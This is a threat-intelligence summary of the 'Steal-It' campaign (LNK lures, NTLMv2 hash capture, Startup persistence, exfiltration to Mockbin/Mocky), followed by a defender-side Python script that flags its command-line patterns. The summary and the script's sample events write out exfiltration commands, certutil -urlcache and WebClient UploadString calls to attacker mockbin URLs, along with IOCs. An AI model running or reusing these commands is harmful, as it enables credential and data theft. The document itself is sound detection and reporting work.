Zscaler ThreatLabz describes the “Steal-It” campaign, which uses malicious LNK files in ZIP archives to deploy customized Nishang-based PowerShell and batch scripts that capture NTLMv2 hashes and system command output, then exfiltrate the data to Mockbin/Mocky endpoints. The campaign includes geofencing (targeting Australia, Poland, Belgium), persistence via the Startup folder, and TTPs consistent with APT28. #NTLMv2 #Mockbin

Key points

  • Initial delivery uses ZIP archives containing malicious LNK shortcuts that open browser-based payloads or download scripts.
  • NTLMv2 hashes are captured via a modified Nishang Start-CaptureServer PowerShell script and exfiltrated to Mockbin endpoints.
  • System information and command outputs (ipconfig, systeminfo, tasklist, whoami) are collected, base64-encoded, and sent to Mockbin/Mocky URLs.
  • Multiple infection chains (NTLMv2 steal, SystemInfo steal, Fansly whoami exfil, Windows Update exfil) employ geofencing to target AU, PL, and BE selectively.
  • Persistence is achieved by moving downloaded LNK/CMD/BAT files into the user Startup folder so they execute on reboot.
  • Exfiltration methods include WebClient.DownloadString/UploadString and certutil URL requests to Mockbin endpoints; payloads are stripped of comments/strings to evade detection.
  • Zscaler links the campaign to APT28 based on overlapping scripts, Mockbin usage, and the “Windows Update” theme observed in prior CERT‑UA reporting.

MITRE Techniques

  • [T1598] Phishing – Initial delivery via archive and shortcut lures to trick users into executing payloads. (‘ZIP archive bundled with a malicious LNK (shortcut) file’)
  • [T1059] Command and Scripting Interpreter – Use of PowerShell, batch (.cmd/.bat), and JavaScript to download, decode, and execute stages. (‘downloads another PowerShell script’ / ‘JavaScript one liner redirecting to the http://run[.]mocky[.]io/v3/<id> URL’)
  • [T1212] Exploitation for Credential Access – Capturing NTLMv2 hashes via a customized Start-CaptureServer script to harvest credentials. (‘capture NTLMv2 hashes’ / ‘customized version of Nishang’s Start-CaptureServer PowerShell script’)
  • [T1567] Exfiltration Over Web Service – Stolen hashes and command outputs are exfiltrated to Mockbin/Mocky endpoints using HTTP GET/POST and certutil requests. (‘exfiltrated via mock APIs’ / ‘Net.WebClient.DownloadString(…) https[:]//mockbin.org/bin/<id>’)
  • [T1037] Startup Items – Achieves persistence by moving downloaded LNK/BAT/CMD files into the Startup folder to run at reboot. (‘move /y %userprofile%\Downloads\m8 m8.lnk’ / ‘copied into the Startup folder’)

Indicators of Compromise

  • [LNK file hashes] Malicious shortcut samples used as the initial vector – 022d01e7007971f5a5096c4f2f2b2aa4, 1e2a320658ba5b616eae7a3e247f44a6 (and other LNK hashes)
  • [PowerShell / script hash] Modified Nishang Start-CaptureServer script – script: 358d9271b8e207e82dafe6ea67c1d198 (used to capture NTLMv2)
  • [Mockbin / Mocky URLs] Exfiltration and stage hosting endpoints – https[:]//mockbin.org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e, https[:]//run.mocky.io/v3/869e530a-51f7-4bec-ae6e-3effb1737691 (and additional run[.]mocky[.]io/mockbin URLs)
  • [Webhook / staging URLs] Alternate hosting used for downloads – https[:]//webhook[.]site/33128548-0eda-4e2b-bf89-7b1b225ecb9f
  • [File names] Notable stage/persist filenames seen in chains – best_tits.zip, onlyfans.com-1.lnk, m8.lnk / m8.cmd (used for persistence and final payload execution)

The technical flow across the Steal‑It infection chains begins with user‑facing ZIP archives that include malicious LNK shortcuts. Those LNKs either launch a browser to a run[.]mocky[.]io HTML page (which runs geofencing JavaScript and decodes a staged payload) or directly invoke PowerShell to download scripts from mockbin/webhook endpoints. One major variant uses a customized Nishang Start‑CaptureServer PowerShell script stripped of comments and detectable strings; it captures base64 NTLMv2 hashes and sends them via Net.WebClient.DownloadString() to https[:]//mockbin[.]org/bin/<id> for remote collection.

Another variant (SystemInfo/Fansly) decodes and drops LNK/CMD/BAT files into Downloads, then moves them into the Startup folder to ensure persistence. The final scripts execute commands (ipconfig, systeminfo, tasklist, whoami), store outputs in ProgramData, base64‑encode them (CertUtil), set environment variables, and exfiltrate results by issuing HTTP requests to Mockbin endpoints (certutil -urlcache GET patterns or WebClient.UploadString POSTs). The Fansly chain uses explicit images as lures and sets an env var (dobpyk) for the whoami output before calling mockbin.org/bin/<id>/<cmd_output> to transmit the data.

The Windows Update themed chain targets Belgium and mirrors these techniques: LNK → run[.]mocky[.]io → decoded batch (c1.bat/b4.cmd) placed in Startup, followed by PowerShell stages that run tasklist/systeminfo and exfiltrate results via WebClient.UploadString() to mockbin[.]org; file‑listing commands (Get-ChildItem … | select FullName) were also observed being exfiltrated. Across all chains the operator uses geofencing checks in JavaScript, staged base64 blobs for payload delivery, and HTTP-based mock endpoints for both hosting and covert exfiltration.
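As an added defender-side illustration (not code from the Zscaler report), the following Python triages constructed process-creation events for the command-line patterns the chains above rely on: certutil -urlcache or WebClient.DownloadString/UploadString aimed at mockbin.org, run.mocky.io or webhook.site, moves from Downloads into the Startup folder, and certutil -encode on files under ProgramData. The sample events, rule names and the `_certutil` helper are assumptions made for this example.

```python
import re

# Constructed process-creation events (image name, command line) modelled on the
# Steal-It chains; they are sample data, not telemetry quoted from the report.
SAMPLE_EVENTS = [
    ("certutil.exe",
     "certutil -urlcache -split -f https://mockbin.org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e/%dobpyk% out.txt"),
    ("powershell.exe",
     "powershell -w hidden -c \"(New-Object Net.WebClient).UploadString('https://mockbin.org/bin/<id>', $o)\""),
    ("cmd.exe",
     "cmd /c move /y %userprofile%\\Downloads\\m8.cmd \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\""),
    ("certutil.exe", "certutil -encode C:\\ProgramData\\sysinfo.txt C:\\ProgramData\\sysinfo.b64"),
    ("certutil.exe", "certutil -hashfile C:\\Windows\\notepad.exe SHA256"),          # benign admin use
    ("powershell.exe", "powershell -c Get-ChildItem C:\\Users | select FullName"),  # benign on its own
]

# Mock-API / webhook hosts the campaign used for staging and exfiltration.
MOCK_HOSTS = re.compile(r"\b(?:mockbin\.org|run\.mocky\.io|webhook\.site)\b", re.I)


def _certutil(image):
    # Hypothetical helper: match the certutil image name case-insensitively.
    return image.lower() == "certutil.exe"


# Each rule is (name, predicate over (image, command line)); the names are our own labels.
RULES = [
    ("certutil_urlcache_to_mock_endpoint",
     lambda img, cl: _certutil(img) and "-urlcache" in cl.lower() and bool(MOCK_HOSTS.search(cl))),
    ("webclient_string_to_mock_endpoint",
     lambda img, cl: bool(re.search(r"net\.webclient|downloadstring|uploadstring", cl, re.I))
     and bool(MOCK_HOSTS.search(cl))),
    ("downloads_to_startup_move",
     lambda img, cl: bool(re.search(r"\bmove\s+/y\b.*\\downloads\\", cl, re.I))
     and bool(re.search(r"\\startup\\?", cl, re.I))),
    ("certutil_encode_in_programdata",
     lambda img, cl: _certutil(img) and "-encode" in cl.lower() and "programdata" in cl.lower()),
]


def triage(events):
    """Return (rule_name, image, command_line) for every event that matches a rule."""
    return [(name, img, cl) for img, cl in events for name, pred in RULES if pred(img, cl)]


if __name__ == "__main__":
    for name, img, cl in triage(SAMPLE_EVENTS):
        print(f"[{name}] {img}: {cl[:80]}")
```

The benign certutil -hashfile and bare Get-ChildItem events produce no finding, so the rules key on the combination of tool, flag and mock endpoint rather than on certutil or PowerShell alone.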

Read more: https://www.zscaler.com/blogs/security-research/steal-it-campaign